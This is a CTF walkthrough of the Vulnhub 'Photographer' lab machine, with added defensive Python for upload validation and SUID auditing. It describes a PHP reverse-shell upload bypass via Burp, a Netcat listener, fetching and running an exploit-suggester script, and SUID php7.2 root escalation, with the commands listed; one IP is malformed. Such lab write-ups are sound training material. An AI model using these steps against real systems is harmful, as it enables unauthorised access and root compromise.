Premise
In this walkthrough, I solved a CTF challenge designed to resemble the OSCP lab machines: the Photographer machine from Vulnhub. We started with an Nmap scan to discover open ports and running services, found a vulnerable version of Koken CMS that gave us remote access, and then escalated privileges by looking for binaries with the SUID bit set.
Machine Description
This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
Skills Learned
- OSCP
- Privilege Escalation through SUID bit permissions exploitation
- Koken CMS
Getting Started: Reconnaissance
The first step in any penetration test is reconnaissance. I start by identifying the target’s IP address and then launch an aggressive Nmap scan to see what services are running. The scan reveals a few interesting things: an Apache web server on port 80, a Samba server, and another web server on port 8000 running a content management system (CMS) called “Koken.”
I take a quick look at the main webpage on port 80, checking the source code for any clues. I also make a mental note of any interactive elements, like search boxes, that I can come back to later for testing things like cross-site scripting (XSS) or command injection.
Finding a Way In: Exploitation
With a list of running services, I start looking for potential vulnerabilities. I check for exploits for the specific versions of Apache and Samba that are running, but I don’t find anything that I can use in a black-box scenario.
My attention then turns to the Koken CMS. A quick search reveals a promising vulnerability: an arbitrary file upload vulnerability. This means I might be able to upload a malicious file to the server and execute it, giving me a foothold on the system.
But before I can exploit this, I need to get into the Koken admin panel. I use a tool called smbclient to see if I can access the Samba shares. I find an unauthenticated share and download a couple of files: a WordPress backup and a “mail sent” file. The mail file contains a message with some interesting phrases that I think might be usernames and passwords.
After a few tries, I successfully log into the Koken CMS dashboard with the username “daisa” and the password “baby girl.”
Now it’s time to exploit the file upload vulnerability. I grab a PHP reverse shell script, modify it with my IP address and a port number, and then I get a little creative. To bypass the file upload restrictions, I rename my PHP script to have a .jpg extension.
I use a tool called Burp Suite to intercept the upload request. As the file is being uploaded, I change the file extension back to .php in the request. I then start a Netcat listener on my machine, and when I forward the modified request, I get a shell! I now have access to the target machine as the www-data user.
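The bypass above works because the server trusts the client-supplied filename: the .jpg rename passes the check, and editing the extension back to .php in the intercepted request decides how the file is stored. The following is an added example, not code from the original post or from Koken, showing the weak check beside a hardened upload validator that derives the stored name and extension from the validated content instead. Function names, the allowed-extension list and the sample inputs are my own assumptions.

```python
"""
Added example (not part of the original post or of Koken CMS): the kind of
extension-only check that the walkthrough bypassed, next to a hardened
server-side validator. The hardened version never lets anything the client
sent (filename or Content-Type header) choose how the file is stored.
"""
import os
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Magic bytes for the image types a gallery should accept. Each entry maps
# the canonical extension to the prefixes its files start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# A file that is a valid JPEG and also carries PHP tags (a polyglot) would
# still execute if the web server ever ran PHP in the uploads directory,
# so reject these markers regardless of the magic bytes.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


def weak_check(filename: str) -> bool:
    """The check the walkthrough defeated: trusts the last extension of the
    client-supplied name and never inspects the content."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def sniff_image_type(content: bytes):
    """Return the canonical extension implied by the magic bytes, or None
    when the content is not one of the allowed image formats."""
    for ext, prefixes in MAGIC.items():
        if any(content.startswith(p) for p in prefixes):
            return ext
    return None


def validate_upload(filename: str, content: bytes):
    """Hardened check. Returns (ok, reason) on rejection or (ok, stored_name).

    The client filename is only sanity-checked; the stored name is random and
    its extension comes from the sniffed content type, so changing the
    filename in transit (as done with Burp Suite above) has no effect.
    """
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    # Reject double extensions such as shell.php.jpg: every part after the
    # first must itself be an allowed image extension.
    if len(parts) < 2 or any(p not in ALLOWED_EXTENSIONS for p in parts[1:]):
        return False, "extension not allowed"
    sniffed = sniff_image_type(content)
    if sniffed is None:
        return False, "content is not a recognised image"
    if any(marker in content for marker in FORBIDDEN_MARKERS):
        return False, "embedded script markers in image"
    # Server-generated name; 'jpeg' uploads are stored as .jpg, for example.
    return True, f"{secrets.token_hex(16)}.{sniffed}"


if __name__ == "__main__":
    # Constructed sample inputs: a renamed PHP file and a minimal JPEG header.
    renamed_shell = ("php-reverse-shell.php.jpg", b"<?php system('id'); ?>")
    real_photo = ("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)
    for name, data in (renamed_shell, real_photo):
        print(name, "weak:", weak_check(name), "hardened:", validate_upload(name, data))
```

Even with this validator in place, the uploads directory should be served with script execution disabled (or kept outside the web root), so that a file which slips through is still only ever delivered as static data.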
Moving Up: Privilege Escalation
Now that I’m in, my next goal is to become the root user. I use a Python one-liner to get a more interactive shell and then start gathering information about the system. I find that it’s running an older version of Ubuntu and a specific kernel version.
I try to use a Linux exploit suggester script to find a kernel exploit, but I run into some issues with a missing file. So, I change my strategy. I start looking for files with the SUID bit set. These are special files that run with the permissions of the file owner, not the user who is running them.
I find that the php7.2 binary has the SUID bit set. This is a huge find! I can now use the PHP binary to execute commands as the root user. I run a simple PHP command to spawn a bash shell, and just like that, I have a root shell! I confirm my new privileges with the id command, and the CTF is complete. 🏆
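The misconfiguration used here, an SUID bit on an interpreter, is easy to audit for on the defending side. The following is an added example, not code from the original post, that walks a filesystem the same way the find command above does and classifies each SUID file: interpreters and shells are flagged as critical (the caller can run arbitrary code as the owner), a short list of binaries that normally carry SUID root on Linux distributions is marked expected, and everything else is left for review. The interpreter and expected lists, function names and the sample directory are my own assumptions.

```python
"""
Added example (not part of the original post): an SUID audit that finds the
php7.2-style misconfiguration exploited above. The INTERPRETERS and
EXPECTED_SUID sets are illustrative assumptions, not an exhaustive list.
"""
import os
import stat

# Basenames that execute code on behalf of their caller. An SUID bit on any
# of these hands the owner's privileges to every local user.
INTERPRETERS = {
    "bash", "sh", "dash", "zsh", "python", "perl", "ruby", "php", "node",
    "vim", "vi", "nano", "awk", "find",
}

# Binaries that legitimately carry SUID root on most distributions.
EXPECTED_SUID = {
    "sudo", "su", "passwd", "mount", "umount", "ping", "chsh", "chfn",
    "newgrp", "gpasswd", "fusermount",
}


def normalise(name: str) -> str:
    """Strip a trailing version so php7.2 and python3.8 match their base names."""
    stripped = name.rstrip("0123456789.")
    return stripped if stripped else name


def classify(path: str) -> str:
    """CRITICAL for interpreters, expected for known SUID helpers, else review."""
    base = normalise(os.path.basename(path))
    if base in INTERPRETERS:
        return "CRITICAL"
    if base in EXPECTED_SUID:
        return "expected"
    return "review"


def find_suid(root: str):
    """Equivalent of `find ROOT -perm -u=s -type f`; returns (path, mode) pairs."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                results.append((path, st.st_mode))
    return results


def audit(root: str):
    """Return [(path, classification)] for every SUID regular file under root."""
    return [(path, classify(path)) for path, _mode in find_suid(root)]


if __name__ == "__main__":
    # Run against a real system with audit("/"); /usr/bin keeps the demo quick.
    for path, verdict in sorted(audit("/usr/bin"), key=lambda item: item[1]):
        print(f"{verdict:9} {path}")
```

A CRITICAL hit such as /usr/bin/php7.2 is fixed with `chmod u-s` on the binary; the same scan is worth scheduling and diffing against a baseline, because a newly appearing SUID file is also a common persistence sign after a compromise.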
Technical Commands Used
Throughout this CTF, I used a variety of commands to achieve my goals. Here are some of the key commands I used:
- Nmap Scan:
nmap -sV -sC -p- 194.94.128
- Searchsploit:
sudo searchsploit apache 2.4.18
sudo searchsploit samba 4.3.11
sudo searchsploit koken 0.22.24
- SMB Client:
smbclient -L 194.94.128
smbclient //194.94.128/samba
- File Transfer (within SMB Client):
get mail.sent
get wordpress.backup
- File Manipulation:
nano php-reverse-shell.php
mv php-reverse-shell.php php-reverse-shell.php.jpg
- Netcat Listener:
nc -nvlp 3434
- Python PTY Shell:
python -c 'import pty; pty.spawn("/bin/bash")'
- System Information Gathering:
cat /etc/os-release
cat /proc/version
- Downloading and Running Scripts:
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
- Finding SUID Binaries:
find / -perm -u=s -type f 2>/dev/null
- Privilege Escalation:
/usr/bin/php7.2 -r 'system("id");'
Video Walk-through